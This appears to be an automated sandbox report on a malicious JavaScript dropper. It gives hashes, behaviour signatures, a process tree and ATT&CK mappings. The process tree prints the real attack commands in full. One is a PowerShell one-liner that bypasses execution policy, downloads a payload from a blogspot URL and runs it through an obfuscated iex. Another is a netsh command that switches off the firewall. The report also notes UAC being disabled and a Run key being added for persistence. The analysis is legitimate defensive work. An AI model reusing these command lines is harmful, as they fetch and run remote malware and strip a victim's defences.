Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
11/01/2024, 03:59
Static task
static1
Behavioral task
behavioral1
Sample
2036c55eeff25d6200dcbf7d4b91bf4137c9829e6435a451ded924c828ec662e.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
2036c55eeff25d6200dcbf7d4b91bf4137c9829e6435a451ded924c828ec662e.js
Resource
win10v2004-20231222-en
General
-
Target
2036c55eeff25d6200dcbf7d4b91bf4137c9829e6435a451ded924c828ec662e.js
-
Size
420KB
-
MD5
ed4a940aceec4031ec56fa375a11dc60
-
SHA1
363a4d5dcf4a5da377c8e0a776216aa2dce7548d
-
SHA256
2036c55eeff25d6200dcbf7d4b91bf4137c9829e6435a451ded924c828ec662e
-
SHA512
e39fb8d235c097de87b15cabe8df770dcd410e4d155b363074d43e80ead98535d864db6647564c819d5500fc2dd92793bf690e2a088f0feca317561f14d7f073
-
SSDEEP
96:83/QJGLDYV9vLQQQQHrmkKnQVUEyVe+4wTRwPZ8:oEfQQQQHrmkKnQVUEyVe+4wTRwPZ8
Malware Config
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" powershell.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 11 2884 powershell.exe 20 2884 powershell.exe 38 2884 powershell.exe 50 2884 powershell.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
pid Process 3040 netsh.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation wscript.exe -
Registers COM server for autorun 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\INtuiteupdate = "schtasks /run /tn INtuiteupdate" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 134 api.ipify.org 135 api.ipify.org -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 2884 set thread context of 436 2884 powershell.exe 118 PID 2884 set thread context of 3052 2884 powershell.exe 119 PID 2884 set thread context of 3268 2884 powershell.exe 123 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp dw20.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString dw20.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS dw20.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dw20.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 4 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\Local Settings powershell.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} powershell.exe Key created \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" powershell.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 436 RegSvcs.exe 436 RegSvcs.exe 436 RegSvcs.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2884 powershell.exe Token: SeDebugPrivilege 436 RegSvcs.exe Token: SeRestorePrivilege 4472 dw20.exe Token: SeBackupPrivilege 4472 dw20.exe Token: SeBackupPrivilege 4472 dw20.exe Token: SeBackupPrivilege 4472 dw20.exe Token: SeBackupPrivilege 4472 dw20.exe Token: SeBackupPrivilege 3240 dw20.exe Token: SeBackupPrivilege 3240 dw20.exe Token: SeIncreaseQuotaPrivilege 2884 powershell.exe Token: SeSecurityPrivilege 2884 powershell.exe Token: SeTakeOwnershipPrivilege 2884 powershell.exe Token: SeLoadDriverPrivilege 2884 powershell.exe Token: SeSystemProfilePrivilege 2884 powershell.exe Token: SeSystemtimePrivilege 2884 powershell.exe Token: SeProfSingleProcessPrivilege 2884 powershell.exe Token: SeIncBasePriorityPrivilege 2884 powershell.exe Token: SeCreatePagefilePrivilege 2884 powershell.exe Token: SeBackupPrivilege 2884 powershell.exe Token: SeRestorePrivilege 2884 powershell.exe Token: SeShutdownPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeSystemEnvironmentPrivilege 2884 powershell.exe Token: SeRemoteShutdownPrivilege 2884 powershell.exe Token: SeUndockPrivilege 2884 powershell.exe Token: SeManageVolumePrivilege 2884 powershell.exe Token: 33 2884 powershell.exe Token: 34 2884 powershell.exe Token: 35 2884 powershell.exe Token: 36 2884 powershell.exe Token: SeIncreaseQuotaPrivilege 2884 powershell.exe Token: SeSecurityPrivilege 2884 powershell.exe Token: SeTakeOwnershipPrivilege 2884 powershell.exe Token: SeLoadDriverPrivilege 2884 powershell.exe Token: SeSystemProfilePrivilege 2884 powershell.exe Token: SeSystemtimePrivilege 2884 powershell.exe Token: SeProfSingleProcessPrivilege 2884 powershell.exe Token: SeIncBasePriorityPrivilege 2884 powershell.exe Token: SeCreatePagefilePrivilege 2884 powershell.exe Token: SeBackupPrivilege 2884 powershell.exe Token: SeRestorePrivilege 2884 powershell.exe Token: SeShutdownPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeSystemEnvironmentPrivilege 2884 powershell.exe Token: SeRemoteShutdownPrivilege 2884 powershell.exe Token: SeUndockPrivilege 2884 powershell.exe Token: SeManageVolumePrivilege 2884 powershell.exe Token: 33 2884 powershell.exe Token: 34 2884 powershell.exe Token: 35 2884 powershell.exe Token: 36 2884 powershell.exe Token: SeIncreaseQuotaPrivilege 2884 powershell.exe Token: SeSecurityPrivilege 2884 powershell.exe Token: SeTakeOwnershipPrivilege 2884 powershell.exe Token: SeLoadDriverPrivilege 2884 powershell.exe Token: SeSystemProfilePrivilege 2884 powershell.exe Token: SeSystemtimePrivilege 2884 powershell.exe Token: SeProfSingleProcessPrivilege 2884 powershell.exe Token: SeIncBasePriorityPrivilege 2884 powershell.exe Token: SeCreatePagefilePrivilege 2884 powershell.exe Token: SeBackupPrivilege 2884 powershell.exe Token: SeRestorePrivilege 2884 powershell.exe Token: SeShutdownPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1172 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe 1172 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4300 wrote to memory of 2884 4300 wscript.exe 91 PID 4300 wrote to memory of 2884 4300 wscript.exe 91 PID 2884 wrote to memory of 1172 2884 powershell.exe 103 PID 2884 wrote to memory of 1172 2884 powershell.exe 103 PID 2884 wrote to memory of 1172 2884 powershell.exe 103 PID 2884 wrote to memory of 2380 2884 powershell.exe 104 PID 2884 wrote to memory of 2380 2884 powershell.exe 104 PID 2380 wrote to memory of 4328 2380 csc.exe 106 PID 2380 wrote to memory of 4328 2380 csc.exe 106 PID 2884 wrote to memory of 3040 2884 powershell.exe 105 PID 2884 wrote to memory of 3040 2884 powershell.exe 105 PID 1172 wrote to memory of 1880 1172 AcroRd32.exe 107 PID 1172 wrote to memory of 1880 1172 AcroRd32.exe 107 PID 1172 wrote to memory of 1880 1172 AcroRd32.exe 107 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 5004 1880 RdrCEF.exe 108 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109 PID 1880 wrote to memory of 3008 1880 RdrCEF.exe 109
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\2036c55eeff25d6200dcbf7d4b91bf4137c9829e6435a451ded924c828ec662e.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm cplcpus.blogspot.com///////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 52⤵
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Public\2023 1040 (Cornelius Morgan G).pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=155D6B57ECFCB5F3E518C7E6B041077C --mojo-platform-channel-handle=1732 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:5004
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=A6991A39B5A2CCC81081F473BEA0B4BD --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=A6991A39B5A2CCC81081F473BEA0B4BD --renderer-client-id=2 --mojo-platform-channel-handle=1740 --allow-no-sandbox-job /prefetch:15⤵PID:3008
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A07450781E2D7C0DB84C9A2D9C12B258 --mojo-platform-channel-handle=2308 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:968
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=1C52815015BFDA280641F91CB1F6E227 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=1C52815015BFDA280641F91CB1F6E227 --renderer-client-id=5 --mojo-platform-channel-handle=1720 --allow-no-sandbox-job /prefetch:15⤵PID:4716
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A129DAAA691A277A7B3DC4B5264D6D5E --mojo-platform-channel-handle=2864 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3268
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 2846⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AE3B66DD4209BB74F8906280F5BDEB76 --mojo-platform-channel-handle=1792 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1960
-
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\di2t4pem\di2t4pem.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2380 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9049.tmp" "c:\Users\Admin\AppData\Local\Temp\di2t4pem\CSCA91244868DF34DC5866DBDD9FBF79E3F.TMP"4⤵PID:4328
-
-
-
C:\Windows\system32\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue3⤵
- Modifies Windows Firewall
PID:3040
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"3⤵PID:3052
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exedw20.exe -x -s 7844⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:4472
-
-
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"3⤵PID:3268
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3616
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
64KB
MD59d82ab5bdd3999eb75b533111c71db0a
SHA1ddc4c48f53dd72ebb6d84b2d667b01920c5ae4f4
SHA2566c5fe72d8fe1cfd0efa2eacdf71bef68fc909e7509b06275312e977ca8ac58b9
SHA5122457f729a143021c3a46e99c271de87f5f6cd72e0bec932c5c28cde80fa472bf181bf7c3bbdaf1200133ef63bcbbb42ac39c8592c11459956d07f413a22bc4e4
-
Filesize
56KB
MD5c26ed30e7d5ab440480838636efc41db
SHA1c66e0d00b56abebfb60d2fcc5cf85ad31a0d6591
SHA2566a3c5c4a8e57f77ecc22078fbf603ecc31fb82d429bd87b7b4b9261447092aef
SHA51296cdb78bca3e01d4513c31661987e5646e6a8ff24708918aa0d66dfa3ca5d98af4862c9f38c4f41f933c345d2d3adfb1d34d1430b33f45f916f41a9872a030df
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
1KB
MD563ba7bf2d4d325835b54ebdc03f17e67
SHA1e8b807eada062f07950c373e44080bceb231aab5
SHA2564eddc0a366d97f2b5e05949b6723daf2d5430ab378bcec8a87da0608fc4459be
SHA512e0ad6329b01ac03bc437d1f88ae8a2c6f73a9e1d1977808ee25e14178256a87600d124b34f8da74c6d7539cbd7ffdb13818fc017b70d80b8ce9535382a687937
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
